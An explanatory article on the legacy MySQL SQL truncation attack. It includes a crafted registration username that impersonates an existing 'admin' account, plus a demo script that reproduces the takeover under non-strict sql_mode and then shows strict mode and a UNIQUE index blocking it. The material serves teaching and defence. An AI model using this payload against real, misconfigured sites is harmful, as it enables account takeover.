SQL Truncation is an attack that no longer works in the latest MySQL versions.
- Requires a MySQL database backend
A SQL Truncation attack takes advantage of two features in MySQL to subvert application logic. These features are:
- 1. If the length of a VARCHAR is exceeded, the rest of the value is simply cut off (truncated). This is no longer the default behaviour of MySQL.
- 2. String comparison ignores trailing spaces (with MySQL's traditional PAD SPACE collations), so 'admin ' and 'admin' compare as equal.
Note: This attack doesn't work in newer MySQL versions, or in other databases such as PostgreSQL, because an error is thrown when the length of a VARCHAR is exceeded.
Let's say there's a website with a MySQL backend and a users table in which the username column is of type VARCHAR(20). Let's also say that there is already an admin account.
Register the following user (the word admin, then enough spaces to pass the 20-character limit, then arbitrary text):
admin (lots of spaces in between)And then whatever
It produces the following SQL query:
INSERT INTO users (username, password) VALUES ('admin (lots of spaces in between)And then whatever', 'mypassword123');
Because MySQL truncates the value to 20 characters, the above is effectively the same as ('admin' plus 15 spaces = 20 characters):
INSERT INTO users (username, password) VALUES ('admin               ', 'mypassword123');
When you later try to log in as admin:mypassword123, the application produces the following query:
SELECT * FROM users WHERE username='admin' AND password='mypassword123'
Because the comparison ignores trailing spaces, this matches the truncated row you registered, and the application treats you as admin.
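The same scenario as an added MySQL script (not from the original page), with the weak sql_mode setting beside the corrected one; the table definition, collation, admin password and row ids are constructed for the demo:

```sql
-- Constructed demo schema: a users table with a 20-character username.
-- utf8mb4_general_ci is a PAD SPACE collation, so trailing spaces are ignored in comparisons
-- (MySQL 8's default utf8mb4_0900_ai_ci is NO PAD and would not treat 'admin ' as 'admin').
CREATE TABLE users (
  id       INT AUTO_INCREMENT PRIMARY KEY,
  username VARCHAR(20)  NOT NULL,
  password VARCHAR(255) NOT NULL
) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;

-- The pre-existing admin account (password constructed for the demo).
INSERT INTO users (username, password) VALUES ('admin', 'correct-horse-battery');

-- Weak setting: an empty (non-strict) sql_mode silently truncates over-length values.
SET SESSION sql_mode = '';
INSERT INTO users (username, password)
VALUES ('admin               And then whatever', 'mypassword123');
SHOW WARNINGS;   -- Warning: Data truncated for column 'username' at row 1
SELECT id, CONCAT('[', username, ']') AS stored, CHAR_LENGTH(username) AS len FROM users;
-- The second row is stored as [admin               ] with len 20.

-- The login query now returns the attacker's row, which the application treats as "admin".
SELECT id, username FROM users
WHERE username = 'admin' AND password = 'mypassword123';

-- Corrected setting: strict mode (the default since MySQL 5.7) rejects the value instead.
DELETE FROM users WHERE id = 2;
SET SESSION sql_mode = 'STRICT_TRANS_TABLES';
INSERT INTO users (username, password)
VALUES ('admin               And then whatever', 'mypassword123');
-- ERROR: Data too long for column 'username' at row 1

-- Defence in depth: with a UNIQUE index on username, even a truncated second 'admin' row
-- would be rejected as a duplicate key under this PAD SPACE collation.
ALTER TABLE users ADD UNIQUE INDEX uq_username (username);
```

Checking `SELECT @@GLOBAL.sql_mode;` on a production server is the quickest way to confirm strict mode is in force.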